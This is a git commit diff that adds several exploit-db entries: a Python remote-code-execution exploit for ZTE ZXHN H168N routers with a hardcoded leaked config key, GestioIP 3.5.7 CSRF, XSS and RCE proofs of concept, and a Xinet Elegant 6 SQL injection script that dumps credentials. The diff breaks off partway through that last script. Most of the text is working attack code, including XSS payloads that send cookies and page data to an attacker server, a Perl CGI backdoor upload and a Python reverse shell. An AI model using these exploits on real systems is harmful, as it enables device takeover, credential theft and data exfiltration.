Merge remote-tracking branch 'exploitdb/main'
This commit is contained in:
commit
3695da6995
15 changed files with 1139 additions and 0 deletions
331
exploits/multiple/hardware/52191.py
Executable file
331
exploits/multiple/hardware/52191.py
Executable file
|
@ -0,0 +1,331 @@
|
|||
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
|
||||
# Author: l34n / tasos meletlidis
|
||||
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
|
||||
|
||||
import http.client, requests, os, argparse, struct, zlib
|
||||
from io import BytesIO
|
||||
from os import stat
|
||||
from Crypto.Cipher import AES
|
||||
|
||||
def login(host, port, username, password):
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
data = {
|
||||
"Username": username,
|
||||
"Password": password,
|
||||
"Frm_Logintoken": "",
|
||||
"action": "login"
|
||||
}
|
||||
|
||||
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
|
||||
|
||||
def logout(host, port):
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
data = {
|
||||
"IF_LogOff": "1",
|
||||
"IF_LanguageSwitch": "",
|
||||
"IF_ModeSwitch": ""
|
||||
}
|
||||
|
||||
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
|
||||
|
||||
def leak_config(host, port):
|
||||
conn = http.client.HTTPConnection(host, port)
|
||||
boundary = "---------------------------25853724551472601545982946443"
|
||||
body = (
|
||||
f"{boundary}\r\n"
|
||||
'Content-Disposition: form-data; name="config"\r\n'
|
||||
"\r\n"
|
||||
"\r\n"
|
||||
f"{boundary}--\r\n"
|
||||
)
|
||||
|
||||
headers = {
|
||||
"Content-Type": f"multipart/form-data; boundary={boundary}",
|
||||
"Content-Length": str(len(body)),
|
||||
"Connection": "keep-alive",
|
||||
}
|
||||
|
||||
conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
|
||||
|
||||
response = conn.getresponse()
|
||||
response_data = response.read()
|
||||
|
||||
with open("config.bin", "wb") as file:
|
||||
file.write(response_data)
|
||||
|
||||
conn.close()
|
||||
|
||||
def _read_exactly(fd, size, desc="data"):
|
||||
chunk = fd.read(size)
|
||||
if len(chunk) != size:
|
||||
return None
|
||||
return chunk
|
||||
|
||||
def _read_struct(fd, fmt, desc="struct"):
|
||||
size = struct.calcsize(fmt)
|
||||
data = _read_exactly(fd, size, desc)
|
||||
if data is None:
|
||||
return None
|
||||
return struct.unpack(fmt, data)
|
||||
|
||||
def read_aes_data(fd_in, key):
|
||||
encrypted_data = b""
|
||||
while True:
|
||||
aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
|
||||
if aes_hdr is None:
|
||||
return None
|
||||
_, chunk_len, marker = aes_hdr
|
||||
|
||||
chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
|
||||
if chunk is None:
|
||||
return None
|
||||
|
||||
encrypted_data += chunk
|
||||
if marker == 0:
|
||||
break
|
||||
|
||||
cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
|
||||
fd_out = BytesIO()
|
||||
fd_out.write(cipher.decrypt(encrypted_data))
|
||||
fd_out.seek(0)
|
||||
return fd_out
|
||||
|
||||
def read_compressed_data(fd_in, enc_header):
|
||||
hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
|
||||
if enc_header[6] != hdr_crc:
|
||||
return None
|
||||
|
||||
total_crc = 0
|
||||
fd_out = BytesIO()
|
||||
|
||||
while True:
|
||||
comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
|
||||
if comp_hdr is None:
|
||||
return None
|
||||
uncompr_len, compr_len, marker = comp_hdr
|
||||
|
||||
chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
|
||||
if chunk is None:
|
||||
return None
|
||||
|
||||
total_crc = zlib.crc32(chunk, total_crc)
|
||||
uncompressed = zlib.decompress(chunk)
|
||||
if len(uncompressed) != uncompr_len:
|
||||
return None
|
||||
|
||||
fd_out.write(uncompressed)
|
||||
if marker == 0:
|
||||
break
|
||||
|
||||
if enc_header[5] != total_crc:
|
||||
return None
|
||||
|
||||
fd_out.seek(0)
|
||||
return fd_out
|
||||
|
||||
def read_config(fd_in, fd_out, key):
|
||||
ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
|
||||
if ver_header_1 is None:
|
||||
return
|
||||
|
||||
ver_header_2_offset = 0x14 + ver_header_1[4]
|
||||
|
||||
fd_in.seek(ver_header_2_offset)
|
||||
ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
|
||||
if ver_header_2 is None:
|
||||
return
|
||||
ver_header_3_offset = ver_header_2[10]
|
||||
|
||||
fd_in.seek(ver_header_3_offset)
|
||||
ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
|
||||
if ver_header_3 is None:
|
||||
return
|
||||
signed_cfg_size = ver_header_3[3]
|
||||
|
||||
file_size = stat(fd_in.name).st_size
|
||||
|
||||
fd_in.seek(0x80)
|
||||
sign_header = _read_struct(fd_in, ">3I", desc="signature header")
|
||||
if sign_header is None:
|
||||
return
|
||||
if sign_header[0] != 0x04030201:
|
||||
return
|
||||
|
||||
sign_length = sign_header[2]
|
||||
|
||||
signature = _read_exactly(fd_in, sign_length, desc="signature")
|
||||
if signature is None:
|
||||
return
|
||||
|
||||
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
|
||||
if enc_header_raw is None:
|
||||
return
|
||||
encryption_header = struct.unpack(">15I", enc_header_raw)
|
||||
if encryption_header[0] != 0x01020304:
|
||||
return
|
||||
|
||||
enc_type = encryption_header[1]
|
||||
|
||||
if enc_type in (1, 2):
|
||||
if not key:
|
||||
return
|
||||
fd_in = read_aes_data(fd_in, key)
|
||||
if fd_in is None:
|
||||
return
|
||||
|
||||
if enc_type == 2:
|
||||
enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
|
||||
if enc_header_raw is None:
|
||||
return
|
||||
encryption_header = struct.unpack(">15I", enc_header_raw)
|
||||
if encryption_header[0] != 0x01020304:
|
||||
return
|
||||
enc_type = 0
|
||||
|
||||
if enc_type == 0:
|
||||
fd_in = read_compressed_data(fd_in, encryption_header)
|
||||
if fd_in is None:
|
||||
return
|
||||
|
||||
fd_out.write(fd_in.read())
|
||||
|
||||
def decrypt_config(config_key):
|
||||
encrypted = open("config.bin", "rb")
|
||||
decrypted = open("decrypted.xml", "wb")
|
||||
|
||||
read_config(encrypted, decrypted, config_key)
|
||||
|
||||
with open("decrypted.xml", "r") as file:
|
||||
contents = file.read()
|
||||
username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
|
||||
password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
|
||||
|
||||
encrypted.close()
|
||||
os.system("rm config.bin")
|
||||
decrypted.close()
|
||||
os.system("rm decrypted.xml")
|
||||
|
||||
return username, password
|
||||
|
||||
def change_log_level(host, port, log_level):
|
||||
level_map = {
|
||||
"critical": "2",
|
||||
"notice": "5"
|
||||
}
|
||||
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
data = {
|
||||
"IF_ACTION": "Apply",
|
||||
"_BASICCONIG": "Y",
|
||||
"LogEnable": "1",
|
||||
"LogLevel": level_map[log_level],
|
||||
"ServiceEnable": "0",
|
||||
"Btn_cancel_LogManagerConf": "",
|
||||
"Btn_apply_LogManagerConf": "",
|
||||
"downloadlog": "",
|
||||
"Btn_clear_LogManagerConf": "",
|
||||
"Btn_save_LogManagerConf": "",
|
||||
"Btn_refresh_LogManagerConf": ""
|
||||
}
|
||||
|
||||
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
|
||||
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
|
||||
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
|
||||
|
||||
def change_username(host, port, new_username, old_password):
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
data = {
|
||||
"IF_ACTION": "Apply",
|
||||
"_InstID": "IGD.AU2",
|
||||
"Right": "2",
|
||||
"Username": new_username,
|
||||
"Password": old_password,
|
||||
"NewPassword": old_password,
|
||||
"NewConfirmPassword": old_password,
|
||||
"Btn_cancel_AccountManag": "",
|
||||
"Btn_apply_AccountManag": ""
|
||||
}
|
||||
|
||||
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
|
||||
requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
|
||||
requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
|
||||
|
||||
def clear_log(host, port):
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
data = {
|
||||
"IF_ACTION": "clearlog"
|
||||
}
|
||||
|
||||
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
|
||||
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
|
||||
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
|
||||
|
||||
def refresh_log(host, port):
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
data = {
|
||||
"IF_ACTION": "Refresh"
|
||||
}
|
||||
|
||||
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
|
||||
requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
|
||||
requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
|
||||
|
||||
def trigger_rce(host, port):
|
||||
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
|
||||
requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
|
||||
|
||||
def rce(cmd):
|
||||
return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
|
||||
|
||||
def pwn(config_key, host, port):
|
||||
leak_config(host, port)
|
||||
username, password = decrypt_config(config_key)
|
||||
|
||||
login(host, port, username, password)
|
||||
|
||||
shellcode = "echo \"pwned\""
|
||||
payload = rce(shellcode)
|
||||
|
||||
change_username(host, port, payload, password)
|
||||
refresh_log(host, port)
|
||||
change_log_level(host, port, "notice")
|
||||
refresh_log(host, port)
|
||||
|
||||
trigger_rce(host, port)
|
||||
clear_log(host, port)
|
||||
|
||||
change_username(host, port, username, password)
|
||||
change_log_level(host, port, "critical")
|
||||
logout(host, port)
|
||||
print("[+] PoC complete")
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
|
||||
parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz<vz&f^9", help="Leaked config encryption key from cspd")
|
||||
parser.add_argument("--host", required=True, help="Target IP address of the router")
|
||||
parser.add_argument("--port", required=True, type=int, help="Target port of the router")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
pwn(args.config_key, args.host, args.port)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
76
exploits/multiple/remote/52200.txt
Normal file
76
exploits/multiple/remote/52200.txt
Normal file
|
@ -0,0 +1,76 @@
|
|||
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
|
||||
# Exploit Author: m4xth0r (Maximiliano Belino)
|
||||
# Author website: https://maxibelino.github.io/
|
||||
# Author email : max.cybersecurity at belino.com
|
||||
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
|
||||
# Date: 2025-01-13
|
||||
# Vendor Homepage: https://www.gestioip.net/
|
||||
# Software Link: https://www.gestioip.net/en/download/
|
||||
# Version: GestioIP v3.5.7
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2024-50858
|
||||
|
||||
### Description
|
||||
|
||||
The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
|
||||
|
||||
### Prerequisites
|
||||
|
||||
The option "Manage - Manage GestioIP - User Management" must be enabled previously.
|
||||
|
||||
|
||||
### Usage
|
||||
|
||||
To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
|
||||
|
||||
|
||||
### File: payload.html
|
||||
#### example: editing user named 'maxi'
|
||||
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Welcome to our site</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: Arial, sans-serif;
|
||||
text-align: center;
|
||||
}
|
||||
.container {
|
||||
margin-top: 50px;
|
||||
}
|
||||
iframe {
|
||||
display: none;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<h1>Thank you for visiting our site!</h1>
|
||||
<p>We are processing your request, please wait a moment...</p>
|
||||
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
|
||||
</div>
|
||||
<!-- hidden iframe -->
|
||||
|
||||
<iframe name="hiddenFrame"></iframe>
|
||||
|
||||
<!-- The form that makes the POST to GestioIP Server -->
|
||||
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
|
||||
<input type="hidden" name="name" value="maxi">
|
||||
<input type="hidden" name="group_id" value="1">
|
||||
<input type="hidden" name="email" value="maxi@test.com">
|
||||
<input type="hidden" name="phone" value="123">
|
||||
<input type="hidden" name="comment" value="">
|
||||
<input type="hidden" name="client_id" value="1">
|
||||
<input type="hidden" name="id" value="2">
|
||||
<input type="hidden" name="B2" value="">
|
||||
</form>
|
||||
<script>
|
||||
history.pushState('', '', '/');
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
56
exploits/multiple/remote/52201.txt
Normal file
56
exploits/multiple/remote/52201.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
|
||||
# Exploit Author: m4xth0r (Maximiliano Belino)
|
||||
# Author website: https://maxibelino.github.io/
|
||||
# Author email: max.cybersecurity at belino.com
|
||||
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
|
||||
# Date: 2025-01-13
|
||||
# Vendor Homepage: https://www.gestioip.net/
|
||||
# Software Link: https://www.gestioip.net/en/download/
|
||||
# Version: GestioIP v3.5.7
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2024-50861
|
||||
|
||||
### Description
|
||||
|
||||
The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.
|
||||
|
||||
### Prerequisites
|
||||
|
||||
1. Enable "DNS Key" Feature
|
||||
First, ensure that "Dynamic DNS updates" is enabled in the global configuration:
|
||||
|
||||
Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes
|
||||
|
||||
This will enable the following menus:
|
||||
|
||||
Manage > DNS Keys
|
||||
Manage > DNS Update User
|
||||
|
||||
2. Create a DNS Key Entry
|
||||
|
||||
To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, "Admin" and "GestioIP Admin" groups have this permission.
|
||||
|
||||
Also, you can configure this permission to any group under:
|
||||
|
||||
Manage > User Groups > Manage Sites and Categories
|
||||
|
||||
3. Enter payload.
|
||||
|
||||
Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.
|
||||
|
||||
|
||||
### Payloads
|
||||
|
||||
1 - Test basic XSS
|
||||
|
||||
<script>alert("test")</script>
|
||||
|
||||
|
||||
2 - Send data (cookies) to the attacker's server
|
||||
|
||||
<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">
|
||||
|
||||
|
||||
3 - Redirect the user to a malicious site
|
||||
|
||||
<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">
|
58
exploits/multiple/remote/52202.txt
Normal file
58
exploits/multiple/remote/52202.txt
Normal file
|
@ -0,0 +1,58 @@
|
|||
# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
|
||||
# Exploit Author: m4xth0r (Maximiliano Belino)
|
||||
# Author website: https://maxibelino.github.io/
|
||||
# Author email (max.cybersecurity at belino.com)
|
||||
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
|
||||
# Date: 2025-01-13
|
||||
# Vendor Homepage: https://www.gestioip.net/
|
||||
# Software Link: https://www.gestioip.net/en/download/
|
||||
# Version: GestioIP v3.5.7
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2024-50859
|
||||
|
||||
### Description
|
||||
|
||||
The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
|
||||
Proper input validation and output encoding are critical to prevent this vulnerability.
|
||||
|
||||
|
||||
### Prerequisites
|
||||
|
||||
Enable (set to 'yes') the parameter:
|
||||
|
||||
Manage > Manage GestioIP > ACL connection management
|
||||
|
||||
|
||||
### Usage
|
||||
|
||||
Select: import/export > Import ACLs/ACL Connections
|
||||
|
||||
Select: "Connection List"
|
||||
|
||||
Select "report only"
|
||||
|
||||
Browse to select the file you want to upload.
|
||||
|
||||
Click 'upload'
|
||||
|
||||
|
||||
|
||||
### Payloads
|
||||
|
||||
#### 1) html file to upload
|
||||
|
||||
<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>
|
||||
|
||||
|
||||
#### 2) js file to exfiltrate data
|
||||
|
||||
var req1 = new XMLHttpRequest();
|
||||
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
|
||||
req1.send();
|
||||
|
||||
response = req1.responseText;
|
||||
|
||||
var req2 = new XMLHttpRequest();
|
||||
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
|
||||
req2.setRequestHeader('Content-Type', 'text/html');
|
||||
req2.send(response);
|
34
exploits/multiple/remote/52203.txt
Normal file
34
exploits/multiple/remote/52203.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
|
||||
# Exploit Author: m4xth0r (Maximiliano Belino)
|
||||
# Author website: https://maxibelino.github.io/
|
||||
# Author email (max.cybersecurity at belino.com)
|
||||
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
|
||||
# Date: 2025-01-13
|
||||
# Vendor Homepage: https://www.gestioip.net/
|
||||
# Software Link: https://www.gestioip.net/en/download/
|
||||
# Version: GestioIP v3.5.7
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2024-50857
|
||||
|
||||
### Description
|
||||
|
||||
The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.
|
||||
|
||||
### Prerequisites
|
||||
|
||||
To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:
|
||||
|
||||
• Show backuped device configurations (read_device_config_perm)
|
||||
• Upload device configurations (write_device_config_perm)
|
||||
• Administrate CM (administrative_cm_perm)
|
||||
|
||||
|
||||
|
||||
1) vulnerable parameter: `host_id`
|
||||
|
||||
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'
|
||||
|
||||
|
||||
2) vulnerable parameter: `stored_config`
|
||||
|
||||
http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'
|
102
exploits/multiple/remote/52204.txt
Normal file
102
exploits/multiple/remote/52204.txt
Normal file
|
@ -0,0 +1,102 @@
|
|||
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
|
||||
# Exploit Author: m4xth0r (Maximiliano Belino)
|
||||
# Author website: https://maxibelino.github.io/
|
||||
# Author email (max.cybersecurity at belino.com)
|
||||
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
|
||||
# Date: 2025-01-13
|
||||
# Vendor Homepage: https://www.gestioip.net/
|
||||
# Software Link: https://www.gestioip.net/en/download/
|
||||
# Version: GestioIP v3.5.7
|
||||
# Tested on: Kali Linux
|
||||
# CVE: CVE-2024-48760
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
# Config
|
||||
username = "gipadmin"
|
||||
password = "PASSWORD"
|
||||
domain = "localhost"
|
||||
local_ip = "10.20.0.1"
|
||||
local_port = 443
|
||||
target_url = f"http://{domain}/gestioip/api/upload.cgi"
|
||||
|
||||
# CGI Backdoor Perl
|
||||
backdoor_code = """#!/usr/bin/perl -w
|
||||
|
||||
use strict;
|
||||
|
||||
print "Cache-Control: no-cache\\n";
|
||||
print "Content-type: text/html\\n\\n";
|
||||
|
||||
my $req = $ENV{QUERY_STRING};
|
||||
chomp ($req);
|
||||
$req =~ s/%20/ /g;
|
||||
$req =~ s/%3b/;/g;
|
||||
$req =~ s/%7c/|/gi;
|
||||
$req =~ s/%27/'/g;
|
||||
$req =~ s/%22/"/g;
|
||||
$req =~ s/%5D/]/g;
|
||||
$req =~ s/%5B/[/g;
|
||||
|
||||
print "<html><body>";
|
||||
print '<!-- CGI backdoor -->';
|
||||
|
||||
if (!$req) {
|
||||
print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
|
||||
} else {
|
||||
print "Executing: $req";
|
||||
}
|
||||
|
||||
print "<pre>";
|
||||
my @cmd = `$req`;
|
||||
print "</pre>";
|
||||
|
||||
foreach my $line (@cmd) {
|
||||
print $line . "<br/>";
|
||||
}
|
||||
|
||||
print "</body></html>";
|
||||
"""
|
||||
|
||||
# Exploit functions
|
||||
def upload_file(session, file_name, file_data):
|
||||
"""Uploads the file to the server"""
|
||||
files = {
|
||||
'file_name': (None, file_name),
|
||||
'leases_file': (file_name, file_data)
|
||||
}
|
||||
response = session.post(target_url, files=files)
|
||||
if "OK" not in response.text:
|
||||
print(f"[!] Error uploading {file_name}.")
|
||||
sys.exit(1)
|
||||
return response
|
||||
|
||||
def run_command(session, cmd):
|
||||
"""Execute a command in the server through the vuln"""
|
||||
url = target_url + '?' + cmd
|
||||
resp = session.get(url)
|
||||
print(resp.text)
|
||||
|
||||
def backdoor_exists(session):
|
||||
"""Verifies if backdoor is already uploaded or not"""
|
||||
response = session.get(target_url + "?whoami")
|
||||
if "www-data" in response.text:
|
||||
return True # backdoor already uploaded
|
||||
return False # backdoor not uploaded yet
|
||||
|
||||
if __name__ == '__main__':
|
||||
with requests.Session() as session:
|
||||
session.auth = (username, password)
|
||||
|
||||
# Verify if backdoor is already uploaded
|
||||
if not backdoor_exists(session):
|
||||
print("\n[!] Uploading backdoor...\n")
|
||||
upload_file(session, 'upload.cgi', backdoor_code)
|
||||
else:
|
||||
print("\n[+] Backdoor already uploaded. Continue...\n")
|
||||
|
||||
# Execute the reverse shell
|
||||
print("\n[!] Executing reverse shell...\n")
|
||||
reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
|
||||
run_command(session, reverse_shell_cmd)
|
189
exploits/multiple/webapps/52192.py
Executable file
189
exploits/multiple/webapps/52192.py
Executable file
|
@ -0,0 +1,189 @@
|
|||
# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
|
||||
# Exploit author: hyp3rlinx
|
||||
|
||||
import requests,time,re,sys,argparse
|
||||
|
||||
#NAPC Xinet Elegant 6 Asset Library v6.1.655
|
||||
#Pre-Auth SQL Injection 0day Exploit
|
||||
#By hyp3rlinx
|
||||
#ApparitionSec
|
||||
#UPDATED: Jan 2024 for python3
|
||||
#TODO: add SSL support
|
||||
#===============================
|
||||
#This will dump tables, usernames and passwords in vulnerable versions
|
||||
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
|
||||
#SQL INJECTION VULN PARAM --> LoginForm[username]
|
||||
#================================================
|
||||
|
||||
IP=""
|
||||
PORT="80"
|
||||
URL=""
|
||||
NUM_INJECTS=20
|
||||
k=1
|
||||
j=0
|
||||
TABLES=False
|
||||
CREDS=False
|
||||
SHOW_SQL_ERROR=False
|
||||
|
||||
|
||||
def vuln_ver_chk():
|
||||
global IP, PORT
|
||||
TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
|
||||
response = requests.get(TARGET)
|
||||
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content.decode()):
|
||||
print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
|
||||
return True
|
||||
print("[!] Version not vulnerable :(")
|
||||
return False
|
||||
|
||||
|
||||
def sql_inject_request(SQL):
|
||||
|
||||
global IP, PORT
|
||||
URL = "http://"+IP+":"+PORT+"/elegant6/login"
|
||||
|
||||
tmp=""
|
||||
headers = {'User-Agent': 'Mozilla/5.0'}
|
||||
payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
|
||||
session = requests.Session()
|
||||
|
||||
res = session.post(URL,headers=headers,data=payload)
|
||||
idx = res.content.decode('utf-8').find('CDbCommand') # Start of SQL Injection Error in response
|
||||
idx2 = res.content.decode('utf-8').find('key 1') # End of SQL Injection Error in response
|
||||
|
||||
return res.content[idx : idx2+3]
|
||||
|
||||
|
||||
|
||||
#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
|
||||
def inc():
|
||||
global k,j
|
||||
while j < NUM_INJECTS:
|
||||
j+=1
|
||||
if k !=1:
|
||||
k+=1
|
||||
return str(j)+','+str(k)
|
||||
|
||||
|
||||
def tidy_up(results):
|
||||
global CREDS
|
||||
idx = results.find("'".encode())
|
||||
if idx != -1:
|
||||
idx2 = results.rfind("'".encode())
|
||||
if not CREDS:
|
||||
return results[idx + 1: idx2 -2]
|
||||
else:
|
||||
return results[idx + 2: idx2]
|
||||
|
||||
|
||||
|
||||
def breach(i):
|
||||
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
|
||||
result=""
|
||||
|
||||
#Dump Usernames & Passwords
|
||||
if CREDS:
|
||||
if i % 2 == 0:
|
||||
target='username'
|
||||
else:
|
||||
target='password'
|
||||
|
||||
SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
|
||||
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
|
||||
|
||||
if not SHOW_SQL_ERROR:
|
||||
result = tidy_up(sql_inject_request(SQL))
|
||||
if result:
|
||||
result = result.decode()
|
||||
else:
|
||||
result = sql_inject_request(SQL)+"\n"
|
||||
if result:
|
||||
result = result.decode()
|
||||
print("[+] Dumping "+str(target)+": "+str(result))
|
||||
|
||||
#Dump Tables
|
||||
if TABLES:
|
||||
while j < NUM_INJECTS:
|
||||
nums = inc()
|
||||
SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
|
||||
'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
|
||||
|
||||
if not SHOW_SQL_ERROR:
|
||||
result = tidy_up(sql_inject_request(SQL))
|
||||
else:
|
||||
result = sql_inject_request(SQL) + "\n"
|
||||
if result:
|
||||
print("[+] Dumping Table... " +str(result.decode()))
|
||||
time.sleep(0.3)
|
||||
|
||||
|
||||
|
||||
def parse_args():
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
|
||||
parser.add_argument("-p", "--port", help="Port, Default is 80")
|
||||
parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
|
||||
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
|
||||
parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
|
||||
parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
|
||||
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
|
||||
return parser.parse_args()
|
||||
|
||||
|
||||
|
||||
def usage():
|
||||
print("Dump first ten rows of usernames and passwords")
|
||||
